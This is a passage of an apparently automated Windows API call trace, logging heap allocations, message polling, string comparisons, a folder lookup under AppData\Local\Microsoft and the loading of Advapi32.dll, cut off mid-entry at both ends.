wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0244.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0244.425] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0244.425] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0244.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0244.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0244.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0244.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0244.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0244.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0244.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0244.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0244.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0244.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0244.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0244.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0244.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0244.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0244.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.426] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0244.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0244.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0244.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0244.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0244.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0244.427] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0244.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0244.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0244.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0244.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0244.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0244.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0244.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0244.427] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0244.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0244.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0244.427] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0244.427] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0244.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0244.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0244.428] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8f8 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0244.428] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0244.428] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0244.428] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.428] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0244.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.429] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0244.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.429] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.429] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Microsoft", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb60530, dwReserved1=0x97e3, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0xaa58e0 [0244.429] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0244.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.430] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0244.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0244.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0244.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0244.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0244.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0244.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0244.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0244.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.432] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.432] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0244.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0244.432] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0244.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0244.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.432] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0244.433] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0244.433] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0244.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.433] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0244.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0244.434] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0244.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0244.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0244.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.434] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0244.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0244.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0244.434] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0244.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0244.435] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0244.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0244.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0244.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0244.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0244.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0244.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0244.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0244.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0244.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0244.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0244.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0244.436] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0244.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0244.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0244.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0244.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0244.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0244.437] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0244.438] HeapFree (in: 